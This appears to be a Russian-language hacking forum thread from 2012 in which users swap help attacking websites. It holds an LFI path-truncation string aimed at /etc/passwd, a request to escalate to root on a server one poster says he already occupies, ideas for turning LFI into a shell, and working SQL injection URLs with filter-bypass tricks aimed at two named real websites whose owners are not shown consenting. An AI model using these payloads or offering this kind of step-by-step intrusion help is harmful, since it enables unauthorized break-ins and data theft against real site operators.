Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 0o Chris o0

    0o Chris o0 New Member

    Joined:
    16 Oct 2011
    Messages:
    142
    Likes Received:
    1
    Reputations:
    0
    Только хотел про это написать) Подставил вместо нулл-байта 2500 повторений /.
    Получилась такая строка ../../../../../../../etc/passwd/./././.[...]/./.
    В таком случае все время ошибка:
    Code:
    Warning: include(../../../../../../../etc/passwd/././././.[...]/././././././. in /var/www/include.php on line 2 Warning: include(): Failed opening '../../../../../../../etc/passwd/./././././././.[...]/./././././. in /var/www/include.php on line 2 
    
    P.S. просто 4096 слэшей не будут работать, т.к. php обрабатывает их не так, как /. . /. удаляется полностью, а // меняются на /, в итоге в конце получим путь не к файлу, а к директории.
     
    #21141 0o Chris o0, 30 Sep 2012
    Last edited: 30 Sep 2012
  2. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    102
    Likes Received:
    0
    Reputations:
    -10
    Сижу на сервере под юзером WWW
    www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin

    Подскажите пожалуйста можна ли как-то повысить права или что интересного можна сделать на сервере? :confused: Спасибо.
     
  3. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Пропиши в консоле uname-a и покажи что выдало.
     
    _________________________
  4. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    102
    Likes Received:
    0
    Reputations:
    -10
    $ uname-a
    Query did not return anything
     
  5. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    135
    Likes Received:
    41
    Reputations:
    26
    с пробелом надо uname -a
     
  6. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    102
    Likes Received:
    0
    Reputations:
    -10
    FreeBSD dh01.hostmedia.net 7.1-RELEASE FreeBSD 7.1-RELEASE #0: Mon Feb 2 17:54:17 EET 2009 root@dm1.wugluskr.org:/usr/src/sys/amd64/compile/iServer amd64
     
  7. diny

    diny New Member

    Joined:
    2 Feb 2011
    Messages:
    92
    Likes Received:
    1
    Reputations:
    0
    Расскажите про уязвимость HTTP Verb Tampering , читал мануалы. Так понял, это из GET запроса в livehttp ( мазила ) менять на POST запрос и все?
    Но что то не получается...
     
  8. Dr.Strangelove

    Joined:
    1 Dec 2008
    Messages:
    111
    Likes Received:
    61
    Reputations:
    -6
    Кто поможет крутануть это дело с подзапросом (без error based)


    http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+

    идем в раздел статей и курим до утра
     
    _________________________
    1 person likes this.
  10. 0o Chris o0

    0o Chris o0 New Member

    Joined:
    16 Oct 2011
    Messages:
    142
    Likes Received:
    1
    Reputations:
    0
    Насколько я понял, уязвимость заключается в неправильной настройке доступа к данным.
    Например ты хочешь прочитать .htaccess, но тебе вылетает 403. Предположим, что в этом случае передается в запросе параметр name с логином юзера, и если он равен 'admin', то доступ разрешен, если нет то 403. Так вот изменив в таком запросе свой логин на 'admin', ты получишь доступ файлу.
     
  11. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    102
    Likes Received:
    0
    Reputations:
    -10
    Помогите новичку получить root на FreeBSD 7.1-RELEASE ,не могу разобраться,спасибо.
     
  12. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    http://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=-1%20/*!union*/%20/*!all*/%20*!select*/%20111111111,22222222,33333,bbbbbbbbb--

    как обойти филтрацию? фильтруется все, кроме A-z и пробела. Даже запятые в примере выше
     
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Ну я бы не сказал что "прям уж почти всё фильтруется". Это высказывание ложно.

    Для начала - инъекция с участием order by проходит на Ура.

    Code:
    _ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+order+by+8+--+  TRUE
    
    _ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+order+by+9+--+  FALSE
    group by как альтернативу order by кстати тоже пропускает.

    Code:
    _ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+group+by+8+--+
    
    _ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+group+by+9+--+
    
    Вопрос - Как ты подбирал столбцы ? Почему их у тебя 4 ?

    Далее - фильтруется не union и не select - фильтруется связка union+select . Обошёл так. Стандартно так-то.

    Code:
    _ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+union+/*!select*/+1
    Приеду домой - попробую обойти фильтр запятых через join - хотя можешь и сам попробовать.
     
    _________________________
  14. CoBecTb

    CoBecTb New Member

    Joined:
    12 Aug 2012
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Ребята помогите воспользоваться иньекцией, объясните плз дураку как её запустить, подробно плз.
     
  15. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,055
    Likes Received:
    615
    Reputations:
    690
    CoBecTb для начало просто изучи английский тут же все и так понятно по логике, и все показано и какие тулзы понадобятся.
     
    _________________________
  16. CoBecTb

    CoBecTb New Member

    Joined:
    12 Aug 2012
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Я всё понимаю, и на каких то форумах аналогично могу ответить как и ты, но в данный момент мне хотелось бы прочитать ответ на мой вопрос. Переводил, ничего не понял, да признаю что нету у меня образования в этой области. Поэтому прошу помощи. Заранее благодарю.
     
  17. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    BigBear, там фильтрация ( и ) есть. как ее обходить - хз. про ордер бай я знаю, просто для примера 4 сделал
     
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Ага, уже посмотрел. + фильтруются любые математические сравнения типа < = >.

    Есть надежда, может они Post запрос не так жёстко фильтровать будут. Надо проверить. А в GET запросах нам точно тут ничего не светит.
     
    _________________________
  19. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Какие еще есть идеи с раскруткой lfi хотя бы до мини-шелла, если phpinfo нет, environ показывает ошибку и denied? Полный путь известен, в конфиг-файлах явок и паролей нет
     
  20. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Так если навскидку:
    искать логи и попытатся их проинклудить
    попытатся залить что то и проинклудить, может там форум есть и можно аватару со своим кодом запилить и т.д.
    попробовать через протокол data
    попробовать проинклудить отправленный на email письмо, если на сервере конечно что то такое крутиться
    попробывать залить какой либо файл через соседей и проинклудить
     
Loading...
Thread Status:
Not open for further replies.